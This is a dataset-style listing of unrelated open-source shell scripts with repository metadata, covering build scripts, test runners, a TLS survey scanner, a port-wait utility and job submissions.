#qsub -v outputdir="${OUTPUT_DIR}/ord",xmin=127,xmax=130,ymin=-18,ymax=-14,acqmin=2006,acqmax=2013 "${PBS_SCRIPT}" # --month 11 12 1 2 3
#qsub -v outputdir="${OUTPUT_DIR}/ord",xmin=127,xmax=130,ymin=-18,ymax=-14,acqmin=2006,acqmax=2013 "${PBS_SCRIPT}" # --month 4 5 6 7 8 9 10
|
ama-jharrison/agdc
|
agdc/api-examples/source/main/python/workflow/wetness.pbs.submit.sh
|
Shell
|
apache-2.0
| 1,890 |
#!/bin/bash
echo "*** run mvn assembly:assembly -DdescriptorId=jar-with-dependencies"
echo "*** in raml-to-jaxrs/core first to make jar"
java -cp ..\..\core\target\raml-jaxrs-codegen-core-1.3.5-SNAPSHOT-jar-with-dependencies.jar org.raml.jaxrs.codegen.core.Launcher -basePackageName com.somecompany.sample -outputDirectory output -sourceDirectory raml
|
OnPositive/aml
|
raml-to-jaxrs/examples/cli-example/run.sh
|
Shell
|
apache-2.0
| 356 |
#!/bin/bash
###
# #%L
# %%
# Copyright (C) 2017 BMW Car IT GmbH
# %%
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# #L%
###
source /data/src/docker/joynr-base/scripts/ci/global.sh
log "CPP RUN END TO END TEST"
CC_BINDIR=/data/build/tests/bin
function usage
{
echo "usage: cpp-build-tests.sh [--cluster-controller-bin-dir <bin directory to cluster-controller>]"
}
while [ "$1" != "" ]; do
case $1 in
--cluster-controller-bin-dir ) shift
CC_BINDIR=$1
;;
* ) usage
exit 1
esac
shift
done
log "ENVIRONMENT"
env
log "CC_BINDIR" $CC_BINDIR
# add debugging output
set -x
TEST_BINDIR="/data/build/tests/bin"
cd $CC_BINDIR
./cluster-controller $TEST_BINDIR/resources/systemintegrationtest-clustercontroller.settings & CLUSTER_CONTROLLER_PID=$!
cd /data/build/tests/bin
./jsit-provider-ws -d testDomain -g joynrdefaultgbid & PROVIDER_PID=$!
# Run the test
./jsit-consumer-ws -d testDomain -g joynrdefaultgbid
TESTRESULT=$?
# Clean up
wait $PROVIDER_PID
kill $CLUSTER_CONTROLLER_PID
if [ $TESTRESULT == 0 ]
then
echo "joynr system integration test succeeded"
else
echo "ERROR joynr system integration test failed with error code $TESTRESULT"
fi
exit $TESTRESULT
|
bmwcarit/joynr
|
docker/joynr-cpp-base/scripts/build/cpp-run-joynr-system-integration-test.sh
|
Shell
|
apache-2.0
| 1,839 |
DIRNAME=$(basename $PWD)
FILE="FROM alpine:3.6
# MAINTAINER Skyboat.io <[email protected]>
RUN apk add --no-cache su-exec && \
adduser -S skyboat
CMD [\"su-exec\", \"skyboat\", \"$DIRNAME\"]
EXPOSE 2390
COPY ./$DIRNAME /usr/bin/$DIRNAME
"
echo "$FILE" > Dockerfile
|
kayteh/saving-light
|
tools/templates/dockerfile.tmpl.bash
|
Shell
|
bsd-2-clause
| 276 |
#
# Kubler phase 1 config, pick installed packages and/or customize the build
#
_packages="dev-db/redis"
#
# This hook is called just before starting the build of the root fs
#
configure_rootfs_build()
{
update_use 'dev-lang/lua' '-readline'
}
#
# This hook is called just before packaging the root fs tar ball, ideal for any post-install tasks, clean up, etc
#
finish_rootfs_build()
{
# disable protected mode
sed -i 's/^protected-mode yes/protected-mode no/g' "${_EMERGE_ROOT}"/etc/redis.conf
}
|
berney/gentoo-bb
|
dock/kubler/images/redis/build.sh
|
Shell
|
bsd-2-clause
| 511 |
#!/bin/bash
# Inspect SSL/TLS versions, cipher support and supported standards
ulimit -c unlimited
cd /root/sslprobe/ssl
TMPFILE=/tmp/sslprobe.$$
# Update list of open ports so we can filter out
# large hosting providers whose customers aren't
# running SSL/TLS anyway
echo "SSLPROBE: Starting prescan at $(date)"
/root/scripts/do-scan-ports.sh
echo "SSLPROBE: Dumping hostname list to $TMPFILE at $(date)"
# mysql -Bse 'SELECT DISTINCT hostname FROM dns_data d LEFT JOIN dns_zones z ON d.zone_id=z.id AND d.version=z.version WHERE rr_type IN("A","AAAA") AND SUBSTRING_INDEX(rr_data,".",3) NOT IN ("46.30.211","194.9.94","195.74.38","194.9.95","212.97.132","141.8.224","79.99.7","82.98.86","188.95.227","83.168.226","89.221.250","62.116.143","62.116.181","216.8.179") ORDER BY REVERSE(hostname)' pc > $TMPFILE
mysql -Bse 'SELECT DISTINCT hostname FROM dns_data d LEFT JOIN dns_zones z ON d.zone_id=z.id AND d.version=z.version LEFT JOIN tcp_scans s ON d.rr_data=s.ip WHERE rr_type IN("A","AAAA") AND SUBSTRING_INDEX(rr_data,".",3) NOT IN ("46.30.211","194.9.94","195.74.38","194.9.95","212.97.132","141.8.224","79.99.7","82.98.86","188.95.227","83.168.226","89.221.250","62.116.143","62.116.181","216.8.179") AND (rr_type = "AAAA" OR s.port_443=1) ORDER BY REVERSE(hostname)' pc > $TMPFILE
echo "SSLPROBE: Probing hosts at $(date)"
< $TMPFILE xargs -P 64 -n 1 /root/sslprobe/sslprobe 2>/dev/null
rm "$TMPFILE"
echo "SSLPROBE: Commit repository at $(date)"
(git add . && git commit -m "$(date)" .)
|
noahwilliamsson/protokollen
|
scanner2013/scripts/do-ssl-probes.sh
|
Shell
|
bsd-2-clause
| 1,502 |
#!/bin/bash
ROOT=$(dirname $0)
# Get CTQG path
export CTQG_PATH=${ROOT}/ctqg/CTQG
if [ $(echo $PATH | grep ${CTQG_PATH} | wc -l) -eq 0 ]; then
export PATH=$PATH:$CTQG_PATH
fi
function show_help {
echo "Usage: $0 [-h] [-rqfRFcpd] [-L #] <filename>.scaffold"
echo " -r Generate resource estimate (default)"
echo " -q Generate QASM"
echo " -f Generate flattened QASM"
echo " -R Disable rotation decomposition"
echo " -l Levels of recursion to run (default=1)"
echo " -F Force running all steps"
echo " -c Clean all files (no other actions)"
echo " -p Purge all intermediate files (preserves specified output,"
echo " but requires recompilation for any new output)"
echo " -d Dry-run; show all commands to be run, but do not execute"
}
# Parse opts
OPTIND=1 # Reset in case getopts has been used previously in the shell.
ctqg=0
clean=0
dryrun=""
force=0
purge=0
res=0
toff=1
targets=""
while getopts "h?cdfFpqrRl:" opt; do
case "$opt" in
h|\?)
show_help
exit 0
;;
c) clean=1
;;
d) dryrun="--dry-run"
;;
F) force=1
;;
f) targets="${targets} flat"
;;
p) purge=1
;;
q) targets="${targets} qasm"
;;
r) res=1
;;
R) targets="${targets} ROTATIONS=0"
;;
l) targets="${targets} SQCT_LEVELS=${OPTARG}"
;;
esac
done
shift $((OPTIND-1))
[ "$1" = "--" ] && shift
# Put resources at the end so it is easy to read
if [ ${res} -eq 1 ]; then
targets="${targets} resources"
fi
# Don't purge until done
if [ ${purge} -eq 1 ]; then
targets="${targets} purge"
fi
# Force first
if [ ${force} -eq 1 ]; then
targets="clean ${targets}"
fi
# Default to resource estimate
if [ -z "${targets}" ]; then
targets="resources"
fi
if [ $# -lt 1 ]; then
echo "Error: Missing filename argument"
show_help
exit 1
fi
filename=${1}
if [ ! -e ${filename} ]; then
echo "${filename}: file not found"
show_help
exit 1
fi
dir="$(dirname ${filename})/"
file=$(basename ${filename} .scaffold)
cfile="${file}.*"
if [ $(egrep '^ctqg.*{\s*' ${filename} | wc -l) -gt 0 ]; then
ctqg=1
toff=1
dir=""
fi
if [ ${clean} -eq 1 ]; then
#echo make -f $ROOT/scaffold/Scaffold.makefile ${dryrun} ROOT=$ROOT FILENAME=${filename} FILE=${file} CFILE=${cfile} clean
make -f $ROOT/scaffold/Scaffold.makefile ${dryrun} ROOT=$ROOT DIRNAME=${dir} FILENAME=${filename} FILE=${file} CFILE=${cfile} clean
exit
fi
#echo make -f $ROOT/scaffold/Scaffold.makefile ${dryrun} ROOT=$ROOT FILENAME=${filename} FILE=${file} CFILE=${cfile} TOFF=${toff} CTQG=${ctqg} ${targets}
make -f $ROOT/scaffold/Scaffold.makefile ${dryrun} ROOT=$ROOT DIRNAME=${dir} FILENAME=${filename} FILE=${file} CFILE=${cfile} TOFF=${toff} CTQG=${ctqg} ${targets}
exit 0
|
hoangt/ScaffCC
|
scaffold.sh
|
Shell
|
bsd-2-clause
| 2,865 |
#!/bin/sh
script=calculate-support-from-counts.py
subdir=support-from-counts
total=0
passed=0
echo "testing ${script}"
# run the test for all files in the input dir of the subdirectory of interest...
for path in $(ls tests/${subdir}/input/*)
do
# set some variables to make the invocation easier to read
#
filename=$(basename "${path}")
input="tests/${subdir}/input/${filename}"
output="tests/${subdir}/output/${filename}"
reference="tests/${subdir}/expected-output/${filename}"
# run the script
#
echo "testing: python ${script} ${input}"
if python "${script}" "${input}" > "${output}"
then
# If it did not exit with an error, compare
# the output produced to the expected "reference" output
#
if diff "${output}" "${reference}"
then
# diff will succeed if the files are identical
#
echo "Passed"
passed=$(expr $passed + 1)
else
echo "Did not create the expected output!"
fi
else
echo "Program failed to exit cleanly"
fi
total=$(expr $total + 1)
done
echo "Passed $passed out of $total tests"
if test $passed -eq $total
then
exit 0
else
exit 1
fi
|
mtholder/swc-tree-support-ex
|
test_support_from_counts.sh
|
Shell
|
bsd-2-clause
| 1,244 |
#!/bin/sh
#drush dis field_project_sidebar -y
#drush pm-uninstall field_project_sidebar -y
#drush en field_project_sidebar -y
|
ncareol/field_project_sidebar
|
reinstall_field_project_sidebar.sh
|
Shell
|
bsd-3-clause
| 126 |
#!/bin/bash
echo `date` start
echo `date` `ps uxww | grep usbmodem246802461 | grep -v grep`
cd /Users/ben/depot/phonescreen
STR=`ps uxww | grep usbmodem246802461 | grep -v grep`
[ -z "$STR" ] && echo `date` Launching phonescreen
[ -z "$STR" ] && /usr/local/bin/python main.py . /dev/tty.usbmodem246802461 >main.out 2>&1 &
sleep 10
echo `date` `ps uxww | grep usbmodem246802461 | grep -v grep`
echo `date` stop
|
benjaveri/phonescreen
|
v1/croncheck.sh
|
Shell
|
bsd-3-clause
| 411 |
#!/bin/sh
rtmlaunch hrpsys_ros_bridge_jvrc midjaxon_jvrc.launch
|
devrt/midjaxon-controller
|
launchrviz.sh
|
Shell
|
bsd-3-clause
| 65 |
#!/bin/bash
export PATH=/usr/local/sratoolkit.2.3.5-2-centos_linux64/bin:$PATH
if [[ $# != 1 ]]; then
echo "usage $0 sra_accession"
else
if [[ ! -a ${1}.sra ]]; then
echo "$1 does not exist."
exit 1
fi
inputfile="$1"
outputfile="${1}.sam.bz2"
outputdir="/usr/local/galaxy-dist/MoazedLabData/Processed"
sam-dump -r --bzip2 --output-file ${outputdir}/${outputfile} ${inputfile}
fi
exit 0
|
danshea/MoazedLab
|
Paper/Scripts/sra2sam.sh
|
Shell
|
bsd-3-clause
| 430 |
#!/bin/bash
BASE_DIR=$(pwd)
SRC_DIR=$BASE_DIR/src
#MAKE_CLEAN=
MAKE_CLEAN="make clean"
#DIST_CLEAN=
DIST_CLEAN="make distclean"
. ./__common-func.sh
__init-env()
{
echo
}
__eudev()
{
__cd eudev.git
git pull
$DIST_CLEAN
./autogen.sh
__cfg --prefix=/usr \
--exec-prefix= \
--sysconfdir=/etc \
--enable-libkmod \
--with-rootprefix= \
--with-rootlibdir=/lib \
--enable-legacylib
$MAKE_CLEAN
__mk
__mk install
ldconfig
}
__all()
{
# __rem() {
__eudev
}
__init-env
$@
|
takeutch-kemeco/private-build-script
|
eudev/all-build.sh
|
Shell
|
bsd-3-clause
| 530 |
# SPDX-License-Identifier: BSD-3-Clause
source helpers.sh
goodfile=$(mktemp)
bigfile=$(mktemp)
{
dd if=/dev/urandom of="${bigfile}" bs=1 count=256
dd if=/dev/urandom of="${goodfile}" bs=1 count=42
} &>/dev/null
cleanup() {
if [ "$1" != "no-shut-down" ]; then
shut_down
rm -f "${bigfile}"
rm -f "${goodfile}"
fi
}
trap cleanup EXIT
start_up
cleanup "no-shut-down"
# Sending bytes from stdin (pipe)
echo -n "return 4" | tpm2 stirrandom -V 2>&1 1>/dev/null | \
grep -q "Submitting 8 bytes to TPM"
# Sending bytes from stdin (file)
tpm2 stirrandom -V < "${goodfile}" 2>&1 1>/dev/null | \
grep -q "Submitting 42 bytes to TPM"
# Sending bytes from a file path
tpm2 stirrandom "${goodfile}" -V 2>&1 1>/dev/null | \
grep -q "Submitting 42 bytes to TPM"
# Try to read more than 128 bytes from file and get an error
if tpm2 stirrandom "${bigfile}"; then
echo "tpm2 stirrandom didn't fail on exceeding requested size"
exit 1
else
true
fi
exit 0
|
01org/tpm2.0-tools
|
test/integration/tests/stirrandom.sh
|
Shell
|
bsd-3-clause
| 997 |
#!/usr/bin/env bash
# Use this script to test if a given TCP host/port are available
cmdname=$(basename $0)
echoerr()
{
if [[ ${QUIET} -ne 1 ]]; then echo "$@" 1>&2; fi
}
usage()
{
cat << USAGE >&2
Usage:
${cmdname} host:port [-s] [-t timeout] [-- command args]
-h HOST | --host=HOST Host or IP under test
-p PORT | --port=PORT TCP port under test
Alternatively, you specify the host and port as host:port
-s | --strict Only execute subcommand if the test succeeds
-q | --quiet Don't output any status messages
-t TIMEOUT | --timeout=TIMEOUT
Timeout in seconds, zero for no timeout
-- COMMAND ARGS Execute command with args after the test finishes
USAGE
exit 1
}
wait_for()
{
if [[ ${TIMEOUT} -gt 0 ]]; then
echoerr "$cmdname: waiting ${TIMEOUT} seconds for ${HOST}:${PORT}"
else
echoerr "${cmdname}: waiting for ${HOST}:${PORT} without a timeout"
fi
start_ts=$(date +%s)
while :
do
(echo > /dev/tcp/${HOST}/${PORT}) >/dev/null 2>&1
result=$?
if [[ ${result} -eq 0 ]]; then
end_ts=$(date +%s)
echoerr "${cmdname}: ${HOST}:${PORT} is available after $((end_ts - start_ts)) seconds"
break
fi
sleep 1
done
return ${result}
}
wait_for_wrapper()
{
# In order to support SIGINT during timeout: http://unix.stackexchange.com/a/57692
if [[ ${QUIET} -eq 1 ]]; then
timeout ${TIMEOUT} $0 --quiet --child --host=${HOST} --port=${PORT} --timeout=${TIMEOUT} &
else
timeout ${TIMEOUT} $0 --child --host=${HOST} --port=${PORT} --timeout=${TIMEOUT} &
fi
PID=$!
trap "kill -INT -$PID" INT
wait $PID
RESULT=$?
if [[ $RESULT -ne 0 ]]; then
echoerr "$cmdname: timeout occurred after waiting $TIMEOUT seconds for $HOST:$PORT"
fi
return $RESULT
}
# process arguments
while [[ $# -gt 0 ]]
do
case "$1" in
*:* )
hostport=(${1//:/ })
HOST=${hostport[0]}
PORT=${hostport[1]}
shift 1
;;
--child)
CHILD=1
shift 1
;;
-q | --quiet)
QUIET=1
shift 1
;;
-s | --strict)
STRICT=1
shift 1
;;
-h)
HOST="$2"
if [[ $HOST == "" ]]; then break; fi
shift 2
;;
--host=*)
HOST="${1#*=}"
shift 1
;;
-p)
PORT="$2"
if [[ $PORT == "" ]]; then break; fi
shift 2
;;
--port=*)
PORT="${1#*=}"
shift 1
;;
-t)
TIMEOUT="$2"
if [[ $TIMEOUT == "" ]]; then break; fi
shift 2
;;
--timeout=*)
TIMEOUT="${1#*=}"
shift 1
;;
--)
shift
CLI="$@"
break
;;
--help)
usage
;;
*)
echoerr "Unknown argument: $1"
usage
;;
esac
done
if [[ "$HOST" == "" || "$PORT" == "" ]]; then
echoerr "Error: you need to provide a host and port to test."
usage
fi
TIMEOUT=${TIMEOUT:-15}
STRICT=${STRICT:-0}
CHILD=${CHILD:-0}
QUIET=${QUIET:-0}
if [[ $CHILD -gt 0 ]]; then
wait_for
RESULT=$?
exit $RESULT
else
if [[ $TIMEOUT -gt 0 ]]; then
wait_for_wrapper
RESULT=$?
else
wait_for
RESULT=$?
fi
fi
if [[ $CLI != "" ]]; then
if [[ $RESULT -ne 0 && $STRICT -eq 1 ]]; then
echoerr "$cmdname: strict mode, refusing to execute subprocess"
exit $RESULT
fi
exec $CLI
else
exit $RESULT
fi
|
SKA-ScienceDataProcessor/integration-prototype
|
sip/tango_control/tango_database/resources/wait-for-it.sh
|
Shell
|
bsd-3-clause
| 3,712 |
streammsechoserverperproc 3 2 epoll localhost:10000:tcp localhost:10001:tcp localhost:10002:tcp localhost:10003:tcp localhost:/tmp/10000:stream localhost:/tmp/10001:stream localhost:/tmp/10002:stream localhost:/tmp/10003:stream
|
ombt/ombt
|
testsrc/servers/streammsechoserverperproc.sh
|
Shell
|
mit
| 228 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.